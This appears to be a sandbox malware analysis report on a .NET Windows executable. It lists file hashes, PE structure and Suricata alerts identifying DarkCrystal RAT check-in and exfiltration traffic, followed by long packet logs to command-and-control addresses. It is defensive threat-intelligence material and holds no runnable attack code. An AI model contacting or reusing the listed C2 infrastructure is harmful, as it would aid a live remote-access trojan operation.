                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................#...........#.. ....#...@.. ........................$...........@.................................p.#.K.....#.p.....................#...................................................... ............... ..H............text....#.. ....#................. ..`.rsrc...p.....#.......#.............@....reloc........#.......#.............@..B..................#.....H...........X.......p...l...a....#......................................0..........(.... ........8........E........9.......8...8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{w...:....& ....8........0.......... ........8........E........*...S...........8.......... ....~....{....:....& ....8....~....:.... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....~....{....:T...& ....8I.......~....(J...~....(N... ....?*... ....~...

                                                                                                C:\Users\user\Downloads\smartscreen.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                \Device\Null

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.852586823588612
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXbgjRFB0XXKNvoPIyXKvj:Vx993DEUvVFB0VNXs
                                                                                                MD5:4DD11E8CC612B7AF5FF5ED79CF33796E
                                                                                                SHA1:8C92DCB87555DD8FAB5AF797FCBF13BE5C5CAFD8
                                                                                                SHA-256:DDDEA2CE89AAD9EDCD10E39223E1DF14F0DD1649EB7FA2D9A2114025D0FADF50
                                                                                                SHA-512:6C37CB7E0D07527D5D0A5D45EF95F4F7B9688376F5681698135F2E46143CEBEE35AD4E489AEAE06527A2FEC321972FAA4AABB7BBBFF4FA985366F714B14FF510
                                                                                                Malicious:false
                                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/10/2024 15:38:16..15:38:16, error: 0x80072746.15:38:21, error: 0x80072746.

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File size:2'335'232 bytes
                                                                                                MD5:670861d1059f9baf2a8525097157d1c2
                                                                                                SHA1:f7007917499121cd5107697593a9429911ae0e77
                                                                                                SHA256:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647caa476557eedb53f97c4
                                                                                                SHA512:3b85b27162b6cd066ba1587271179c943edc5bedb1ed8ec96d3d3c13467b6b46a7a8809701bf0b7273cefa34b3fe1248e138d1de116987d689377cb88986eb4b
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                TLSH:0AB5CF0A95A34E33D2A5BF7988AB043D52B0C6637512EF1B364F90D1A9073349E372F6
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................#...........#.. ....#...@.. ........................$...........@................................

                                                                                                File Icon

                                                                                                Icon Hash:00928e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x63b9be
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x23b9700x4b.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x23c0000x370.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x23e0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x2399c40x239a007b62c0016612ac7b66b29de094e2a6abunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x23c0000x3700x400dc6e9d038b87adeb17d7106e2f652653False0.3779296875data2.867353130536527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .reloc0x23e0000xc0x200373b0635dc862852f3697fadc8e0f428False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_VERSION0x23c0580x318data0.44823232323232326

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-10-11T20:37:12.962571+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54970534.117.59.81443TCP
                                                                                                2024-10-11T20:37:35.009718+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.5497985.42.66.5180TCP
                                                                                                2024-10-11T20:37:49.364405+02002048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)1192.168.2.5498965.42.66.5180TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 11, 2024 20:37:10.370153904 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:10.370208025 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:10.370300055 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:10.383102894 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:10.383124113 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:10.976500034 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:10.976598024 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:10.980869055 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:10.980901957 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:10.981302977 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:11.032697916 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:11.079417944 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:11.158703089 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:11.158885002 CEST4434970434.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:11.158977032 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:11.164141893 CEST49704443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:11.244606018 CEST49705443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:11.244653940 CEST4434970534.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:11.244798899 CEST49705443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:11.244978905 CEST49705443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:11.244990110 CEST4434970534.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:12.760675907 CEST4434970534.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:12.762597084 CEST49705443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:12.762614012 CEST4434970534.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:12.962785959 CEST4434970534.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:12.962961912 CEST4434970534.117.59.81192.168.2.5
                                                                                                Oct 11, 2024 20:37:12.963021040 CEST49705443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:12.963296890 CEST49705443192.168.2.534.117.59.81
                                                                                                Oct 11, 2024 20:37:13.318420887 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:13.318465948 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:13.318527937 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:13.369318008 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:13.369344950 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.011759043 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.011837959 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.061903000 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.061933994 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.062834024 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.063905954 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.111402035 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.303956032 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.314940929 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.314975977 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.316962004 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.316966057 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317015886 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317023039 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317069054 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317075968 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317128897 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317132950 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317204952 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317209005 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317397118 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317404032 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317425013 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317435026 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317460060 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317468882 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317636967 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317645073 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317673922 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317682028 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317713022 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317719936 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.317986965 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.317995071 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318017006 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318022013 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318069935 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318077087 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318100929 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318106890 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318140030 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318160057 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318171978 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318198919 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318217993 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318253040 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318278074 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318310022 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318315029 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318342924 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318350077 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318366051 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318382025 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318391085 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318413019 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318418980 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318453074 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318460941 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318491936 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.318497896 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.318547964 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.319645882 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.932888985 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.933095932 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.933600903 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:14.933672905 CEST44349706149.154.167.220192.168.2.5
                                                                                                Oct 11, 2024 20:37:14.933744907 CEST49706443192.168.2.5149.154.167.220
                                                                                                Oct 11, 2024 20:37:34.073363066 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:34.078386068 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:34.078483105 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:34.078788996 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:34.083823919 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:34.439950943 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:34.444885015 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:34.794745922 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:35.004265070 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:35.009717941 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:36.198700905 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:36.199012995 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:36.199080944 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:36.317935944 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:36.427625895 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:38.070677042 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:38.075892925 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:38.287925005 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:38.288165092 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:38.294941902 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:38.513144016 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:38.716783047 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.455179930 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.455548048 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.460438967 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.460544109 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.460701942 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.460957050 CEST80497985.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.461009979 CEST4979880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.465606928 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.534938097 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.540177107 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.540322065 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.540322065 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.545851946 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.821448088 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.827105045 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.827124119 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.827127934 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.888708115 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:42.893632889 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:42.893831968 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:43.144619942 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:43.232415915 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:43.255204916 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:43.274619102 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:43.275043011 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:43.283235073 CEST80498515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:43.283327103 CEST4985180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:43.382978916 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:43.383138895 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.429600000 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.430316925 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.435010910 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.435147047 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.435208082 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.435272932 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.435651064 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.440474033 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.795135975 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.800460100 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.800913095 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:46.656552076 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.661489010 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:46.661561966 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.661664963 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.666487932 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:46.702755928 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.752327919 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.015513897 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.020575047 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.020586014 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.020595074 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.361632109 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.435548067 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.500583887 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.544895887 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.654146910 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.654871941 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.659599066 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.659666061 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.660278082 CEST80498845.42.66.51192.168.2.5
